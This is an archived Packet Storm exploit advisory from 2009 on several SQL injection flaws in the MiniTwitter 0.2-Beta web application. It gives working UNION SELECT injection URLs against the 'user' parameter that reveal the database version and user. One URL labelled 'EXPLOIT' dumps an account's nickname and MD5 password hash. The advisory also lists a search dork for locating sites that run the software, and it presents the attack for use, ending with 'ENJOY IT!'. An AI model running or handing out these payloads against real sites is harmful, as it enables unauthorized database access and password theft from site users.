exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

MiniTwitter 0.2-Beta SQL Injection

MiniTwitter 0.2-Beta SQL Injection
Posted May 3, 2009
Authored by YEnH4ckEr

MiniTwitter version 0.2-Beta suffers from multiple remote SQL injection vulnerabilities.

tags | exploit, remote, vulnerability, sql injection
SHA-256 | 00d9d56dcde580db6705020cbf064f4ce46361aef47a3fd40880d09d39c76f90

MiniTwitter 0.2-Beta SQL Injection

Change Mirror Download
---------------------------------------------------------------------
MULTIPLE SQL INJECTION VULNERABILITIES --MiniTwitter v0.2-Beta-->
---------------------------------------------------------------------

CMS INFORMATION:

-->WEB: http://mt.bioscriptsdb.com/
-->DOWNLOAD: http://sourceforge.net/projects/minitt/
-->DEMO: http://www.bioscripts.net/minitwitter/index.php
-->CATEGORY: Social Networking
-->DESCRIPTION: Your business needs a private twitter. You can add...
several twitters account and use this twitter as a buckup of all...
-->RELEASED: 2009-04-30

CMS VULNERABILITY:

-->TESTED ON: firefox 3
-->DORK: "BioScripts"
-->CATEGORY: SQL INJECTION (SQLi)
-->AFFECT VERSION: <= 0.2 Beta
-->Discovered Bug date: 2009-04-30
-->Reported Bug date: 2009-04-30
-->Fixed bug date: 2009-05-01
-->Info patch (0.3 Beta): http://sourceforge.net/projects/minitt/
-->Author: YEnH4ckEr
-->mail: y3nh4ck3r[at]gmail[dot]com
-->WEB/BLOG: N/A
-->COMMENT: A mi novia Marijose...hermano,cuñada, padres (y amigos xD) por su apoyo.
-->EXTRA-COMMENT: Gracias por aguantarme a todos! (Te kiero xikitiya!)



##############################
//////////////////////////////

SQL INJECTION (SQLi):

/////////////////////////////
##############################



<<<<---------++++++++++++++ Condition-1: magic_quotes_gpc=off +++++++++++++++++--------->>>>

<<<<---------++++++++++++++++ Condition-2: Be register user +++++++++++++++++++--------->>>>



This aplication is completely vulnerable to sql injection.


-----
PoC:
-----


File: index.php Var: GET var 'user' -->


http://[HOST]/[HOME_PATH]/index.php?user=2%27+UNION+ALL+SELECT+1,version()/*


Return --> Database version.


File: inc/rss.php Var: GET var 'user' -->


http://[HOST]/[HOME_PATH]/rss.php?user=2%27+UNION+ALL+SELECT+user(),2/*


Return --> Database user.


---------
EXPLOIT:
---------


http://[HOST]/[HOME_PATH]/index.php?user=2%27+UNION+ALL+SELECT+2,concat(nick,0x3A3A3A,password)+FROM+mt_users+WHERE+id_usr=1/*


Return --> nick:::password(md5 hash)



<<<-----------------------------EOF---------------------------------->>>ENJOY IT!


#######################################################################
#######################################################################
##*******************************************************************##
## ESPECIAL GREETZ TO: Str0ke, JosS, Ulises2K ... ##
##*******************************************************************##
##-------------------------------------------------------------------##
##*******************************************************************##
## GREETZ TO: SPANISH H4ck3Rs community! ##
##*******************************************************************##
#######################################################################
#######################################################################
Login or Register to add favorites

File Archive:

November 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Nov 1st
    30 Files
  • 2
    Nov 2nd
    0 Files
  • 3
    Nov 3rd
    0 Files
  • 4
    Nov 4th
    12 Files
  • 5
    Nov 5th
    44 Files
  • 6
    Nov 6th
    18 Files
  • 7
    Nov 7th
    9 Files
  • 8
    Nov 8th
    8 Files
  • 9
    Nov 9th
    3 Files
  • 10
    Nov 10th
    0 Files
  • 11
    Nov 11th
    14 Files
  • 12
    Nov 12th
    20 Files
  • 13
    Nov 13th
    63 Files
  • 14
    Nov 14th
    18 Files
  • 15
    Nov 15th
    8 Files
  • 16
    Nov 16th
    0 Files
  • 17
    Nov 17th
    0 Files
  • 18
    Nov 18th
    17 Files
  • 19
    Nov 19th
    0 Files
  • 20
    Nov 20th
    0 Files
  • 21
    Nov 21st
    0 Files
  • 22
    Nov 22nd
    0 Files
  • 23
    Nov 23rd
    0 Files
  • 24
    Nov 24th
    0 Files
  • 25
    Nov 25th
    0 Files
  • 26
    Nov 26th
    0 Files
  • 27
    Nov 27th
    0 Files
  • 28
    Nov 28th
    0 Files
  • 29
    Nov 29th
    0 Files
  • 30
    Nov 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close